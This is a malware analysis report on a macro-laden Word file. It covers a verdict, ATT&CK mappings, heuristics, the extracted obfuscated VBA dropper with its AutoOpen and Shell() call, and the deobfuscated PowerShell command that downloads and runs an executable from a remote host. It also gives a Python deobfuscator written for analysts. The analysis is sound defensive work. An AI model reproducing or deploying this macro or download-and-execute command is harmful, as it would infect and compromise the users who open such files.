Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample contains VBA macros, including an AutoOpen entry point and a critical Shell() call, which together indicate malicious intent. The SE_ENABLE_LURE heuristic shows the document body also coaxes the user into enabling macros, and the ClamAV signature plus the recovered VBA project (extracted as macros.bas below) support the verdict. The macro body is obfuscated by splitting the payload into dozens of one- and two-character string variables that ladmo() concatenates at run time into a single cmd.exe /c command; the PowerShell inside it is further hidden with cmd.exe caret escapes, which cmd.exe strips before execution. Resolving the concatenation and the carets gives, with case normalised:

powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('hxxp://onion1[.]host:443/temper/PGPClient.exe','%APPDATA%.exe'); Start-Process '%APPDATA%.exe'

So this is a second-stage downloader: it fetches an executable over plain HTTP on port 443 (the scheme is http despite the port) and launches it from a path built from %APPDATA%. Three caveats for analysts. First, the Shell() call runs only if ActiveDocument.DefaultTableStyle evaluates to an empty string, so behaviour may differ between Word and a VBA emulator that does not model that property. Second, the EMBEDDED_URL finding is a standard OOXML schema namespace rather than an indicator; the only network indicator is the URL inside the macro. Third, no finding on this page evidences an exploit, so the T1203 mapping is tentative; execution here depends on the user enabling macros (T1204.002). Note also that the OLE_LEGACY_WORDBASIC_AUTOEXEC text states that no modern VBA project was recovered, which the extracted project contradicts; treat that finding as overlapping with OLE_VBA_AUTOOPEN rather than as independent evidence.
Heuristics (7)
- ClamAV: Doc.Trojan.X-Mas-5635802-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.X-Mas-5635802-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the standard DrawingML XML namespace identifier found in any Office document that uses drawings, not a network indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12475 bytes | 10aca1c8671db42d67b4ee5f28720f42915cb36ca19573a8e84080b4274786c0 |
Preview: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Attribute VB_Name = "Module2"
Attribute VB_Name = "mode"
Sub ladmo()
rbe = "PD"
yg = "h^"
rz = "^T"
da = ".w"
p = "t "
kfa = "^N"
uvr = " "
esx = "^ "
ok = "S^"
xh = "Ow"
tze = "^w"
mpa = "'"""
azv = "FI"
ywk = "oN"
ca = ";S"
yhc = "io"
wxa = "^o"
Z = " "
gy = "po"
ps = "BJ"
fy = "Xe"
xso = "xe"
jf = "TI"
wy = "Pr"
t = " "
azh = "'%"
ibh = "')"
us = "t^"
dc = "^D"
yl = "C^"
ki = "a%"
ynx = "^O"
ze = "^e"
ilg = "E^"
kh = "-^"
od = " "
wu = "^a"
qju = "^E"
uw = "a%"
x = "E^"
vpo = "/P"
j = ".e"
eh = "eW"
v = "rs"
yh = "Cl"
u = "D."
yp = "//"
c = ".h"
kz = "SY"
d = " "
pga = "tt"
pl = "',"
wso = "-E"
om = "c^"
iv = " ^"
vj = "S^"
um = ")^"
f = " b"
a = "XE"
wn = "E "
fz = ".E"
bs = "^o"
gby = "os"
jc = "3/"
uzj = "PO"
yqs = "^R"
che = "I^"
ci = "Oa"
opw = " "
nm = "mp"
k = "er"
ajb = "'%"
vn = "nL"
hr = "LI"
se = "U^"
mnywig = ActiveDocument.DefaultTableStyle
cy = "s^"
E = "Cy"
s = "E^"
he = "Cm"
ol = "E("
icc = "Pr"
efg = "cE"
jhi = "^b"
lho = "XE"
xgu = "^o"
zq = "M."
ew = "LI"
ak = "T^"
egn = "ap"
elq = "^l"
bf = " "
o = "^w"
ivp = "N^"
sdo = "T^"
ma = "44"
b = "-N"
igf = "^c"
ik = "nD"
eb = "Wi"
wc = "Yp"
gk = "ie"
gi = "nt"
okc = "At"
ep = "on"
xga = "n1"
ivk = "D^"
i = "Yl"
zwy = "aT"
y = "ss"
wga = ".e"
pb = "HI"
ne = "t:"
yk = "p:"
uz = "L^"
ihv = "Nt"
zu = "D^"
ml = "ap"
ub = "EL"
fj = "te"
kg = " "
kky = "Ta"
pi = "/c"
wq = "^ "
py = " ^"
ym = "-^"
sy = "De"
bg = "xe"
dzi = "^-"
n = "Le"
yzq = "(N"
ums = "S "
eg = "E "
l = "Ex"
ur = "Of"
re = " """
pdy = "pd"
xpi = "GP"
eqf = "e^"
ck = ".^"
irn = ".e"
q = "'h"
icovog = he + u + l + eg + pi + re + uzj + o + s + v + yg + ub + uz + wga + a + uvr + iv + wso + xso + igf + se + jf + ywk + gy + ew + E + Z + opw + f + wc + wu + y + esx + kg + od + b + ynx + icc + ur + che + n + bf + ym + eb + ik + xgu + tze + ok + ak + i + wn + py + pb + zu + sy + kfa + wq + t + yzq + eh + dzi + wxa + ps + x + om + p + d + kz + cy + us + eqf + zq + ivp + ilg + sdo + da + ze + jhi + yl + hr + qju + ihv + um + ck + ivk + xh + vn + ci + dc + azv + elq + ol + q + pga + yk + yp + ep + yhc + xga + c + gby + ne + ma + jc + fj + nm + k + vpo + xpi + yh + gk + gi + j + bg + pl + azh + egn + rbe + zwy + ki + irn + fy + ibh + ca + kky + yqs + rz + kh + wy + bs + efg + vj + ums + ajb + ml + pdy + okc + uw + fz + lho + mpa
If mnywig = "" Then
Shell icovog, 0
End If
End Sub
Sub AutoOpen()
ladmo
End Sub
' Processing file: /opt/analyzer/scan_staging/703291eb819f4703943c783f6f869ee2.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1088 bytes
' Macros/VBA/Module1 - 831 bytes
' Macros/VBA/Module2 - 831 bytes
' Macros/VBA/mode - 7652 bytes
' Line #0:
' FuncDefn (Sub ladmo())
' Line #1:
' Line #2:
' LitStr 0x0002 "PD"
' St rbe
' Line #3:
' LitStr 0x0002 "h^"
' St yg
' Line #4:
' LitStr 0x0002 "^T"
' St rz
' Line #5:
' LitStr 0x0002 ".w"
' St da
' Line #6:
' LitStr 0x0002 "t "
' St p
' Line #7:
' LitStr 0x0002 "^N"
' St kfa
' Line #8:
' LitStr 0x0002 " "
' St uvr
' Line #9:
' LitStr 0x0002 "^ "
' St esx
' Line #10:
' LitStr 0x0002 "S^"
' St ok
' Line #11:
' LitStr 0x0002 "Ow"
' St xh
' Line #12:
' LitStr 0x0002 "^w"
' St tze
' Line #13:
' LitStr 0x0002 "'""
' St mpa
' Line #14:
' LitStr 0x0002 "FI"
' St azv
' Line #15:
' LitStr 0x0002 "oN"
' St ywk
' Line #16:
' LitStr 0x0002 ";S"
' St ca
' Line #17:
' LitStr 0x0002 "io"
' St yhc
' Line #18:
' LitStr 0x0002 "^o"
' St wxa
' Line #19:
' LitStr 0x0002 " "
' St Z
' Line #20:
' LitStr 0x0002 "po"
' St gy
' Line #21:
' LitStr 0x0002 "BJ"
'
... (truncated)
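The concatenation in ladmo() can be resolved statically rather than by emulation. The Python script below is an added example written for this report; it is not part of the analyzer, of olevba, or of the sample. It parses literal assignments and '+' chains, resolves the argument of Shell(), records the If-gate on the Word object-model property, and then applies the two cmd.exe rules that make this obfuscation work: /c strips the outer double quotes of its argument, and outside double quotes a caret escapes the following character. SAMPLE_VBA is a constructed macro in the same shape as the extracted one; all function and pattern names are the author's own. Given the path to macros.bas as its argument, it reproduces the command quoted in the Malware Insights section.

```python
"""Static deobfuscator for the ladmo() pattern: many short string variables,
one long '+' concatenation, and Shell() of a caret-escaped cmd.exe /c command.
Added example for this report; not part of the analyzer or olevba."""
import re
import sys

# Constructed sample mirroring the shape of the extracted macro (not copied from it).
SAMPLE_VBA = r'''
Sub ladmo()
a = "Cm"
b = "D."
c = "ExE /c "
q = """"
d = "PO^wE^r"
e = "sh^ELL -w^indowstyle hid^den"
f = " -c ^(Get-Date^)"
g = """"
guard = ActiveDocument.DefaultTableStyle
cmd = a + b + c + q + d + e + f + g
If guard = "" Then
Shell cmd, 0
End If
End Sub
'''

NAME = r'[A-Za-z_]\w*'
LIT_RE = re.compile(rf'^\s*({NAME})\s*=\s*"((?:[^"]|"")*)"\s*$')
CAT_RE = re.compile(rf'^\s*({NAME})\s*=\s*({NAME}(?:\s*[+&]\s*{NAME})+)\s*$')
OBJ_RE = re.compile(rf'^\s*({NAME})\s*=\s*((?:ActiveDocument|ThisDocument|Application)\.\w+)\s*$', re.I)
IF_RE = re.compile(rf'^\s*If\s+({NAME})\s*=\s*"((?:[^"]|"")*)"\s*Then', re.I)
SHELL_RE = re.compile(rf'^\s*Shell\s+({NAME})', re.I)
CMD_RE = re.compile(r'^\s*\S*cmd(?:\.exe)?\s+/c\s+(.*)$', re.I | re.S)


def parse_macro(src):
    """Collect literals, concatenations, object-model lookups, the If-gate and
    Shell() arguments. VBA names are case-insensitive, so keys are lowered."""
    lits, cats, objs, gate, shells = {}, {}, {}, None, []
    for line in src.splitlines():
        if line.lstrip().startswith("'"):      # VBA comment (e.g. olevba p-code dump)
            continue
        if m := LIT_RE.match(line):
            lits[m[1].lower()] = m[2].replace('""', '"')   # VBA doubles quotes in strings
        elif m := CAT_RE.match(line):
            cats[m[1].lower()] = [p.lower() for p in re.split(r'\s*[+&]\s*', m[2])]
        elif m := OBJ_RE.match(line):
            objs[m[1].lower()] = m[2]
        elif m := IF_RE.match(line):
            gate = (m[1].lower(), m[2].replace('""', '"'))
        elif m := SHELL_RE.match(line):
            shells.append((m[1].lower(), gate))   # gate active when Shell() is reached
    return lits, cats, objs, shells


def resolve(name, lits, cats, seen=()):
    """Follow a variable through concatenations down to string literals."""
    if name in lits:
        return lits[name]
    if name in cats and name not in seen:
        return ''.join(resolve(p, lits, cats, seen + (name,)) for p in cats[name])
    return f'<{name}>'   # not a literal we parsed (e.g. an object-model value)


def cmd_unescape(cmdline):
    """Approximate cmd.exe handling of a /c argument: strip the outer pair of
    double quotes (old-style behaviour, which applies because the string holds
    special characters), then treat '^' outside double quotes as an escape."""
    m = CMD_RE.match(cmdline)
    body = m[1] if m else cmdline
    if m and body.startswith('"') and body.count('"') >= 2:
        last = body.rfind('"')
        body = body[1:last] + body[last + 1:]
    out, quoted, i = [], False, 0
    while i < len(body):
        ch = body[i]
        if ch == '"':
            quoted = not quoted
            out.append(ch)
        elif ch == '^' and not quoted and i + 1 < len(body):
            out.append(body[i + 1])    # escaped character is taken literally
            i += 1
        elif ch != '^' or quoted:
            out.append(ch)             # a trailing lone '^' is dropped
        i += 1
    return ''.join(out)


def deobfuscate(src):
    """Return one record per Shell() call: raw string, cmd-unescaped command, gate."""
    lits, cats, objs, shells = parse_macro(src)
    results = []
    for var, gate in shells:
        raw = resolve(var, lits, cats)
        gate_txt = f'{objs.get(gate[0], gate[0])} = "{gate[1]}"' if gate else None
        results.append({'raw': raw, 'command': cmd_unescape(raw), 'gate': gate_txt})
    return results


if __name__ == '__main__':
    src = open(sys.argv[1], encoding='utf-8', errors='replace').read() if len(sys.argv) > 1 else SAMPLE_VBA
    for r in deobfuscate(src):
        print('gate   :', r['gate'])
        print('raw    :', r['raw'])
        print('command:', r['command'])
```

The quote rule is the heart of the trick: cmd.exe /c removes the first and last double quote of its argument unless the argument is exactly one quoted executable path with no special characters, so the inner PowerShell line is then parsed with ^ acting as an escape. Carets inside a remaining double-quoted region are left alone, which matters for samples that quote their PowerShell arguments with double rather than single quotes; the sample above, like the extracted macro, uses single quotes, which cmd.exe does not treat specially.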